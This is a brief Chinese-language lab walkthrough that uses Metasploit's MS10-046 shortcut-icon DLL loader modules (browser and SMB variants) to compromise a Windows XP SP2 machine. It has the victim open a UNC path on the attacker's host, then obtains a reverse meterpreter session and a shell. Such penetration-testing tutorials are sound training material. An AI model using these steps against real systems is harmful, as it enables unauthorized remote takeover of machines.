攻击机:kali
靶机:windows xp sp2
使用metasploit框架,需要启用metasploit所依赖的postgresql数据库
在kali上启动postgresql命令【systemctl start postgresql】
如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开
启动msfconsole
搜索ms10-046相应的模块
这里有两个可利用的模块,browser和smb
Metasploit中大部分exploit模块都会给出一个Rank的值,按模块的利用成功率会由低到高[Average→Normal→Good→Great→Excellent]
首先选择exploit/windows/browser/ms10_046_shortcut_icon_dllloader攻击模块[可以根据右边的编号use 0]
默认参数设置好了,exploit后等待反弹
在靶机上访问\\192.168.200.144\PKVDcB后
根据提示信息,已经建立session会话
sessions -i 1进入meterpreter会话,输入shell拿权,ipconig查看靶机的IP信息
或者也可以使用前面讲到的exploit/windows/smb/ms10_046_shortcut_icon_dllloader模块
同样的,搜索ms10-046
选择第二个攻击模块,show options查询需要配置的参数
设置所使用的payload、设置文件共享服务器的地址与反弹地址
与上个例子一样exploit后拿权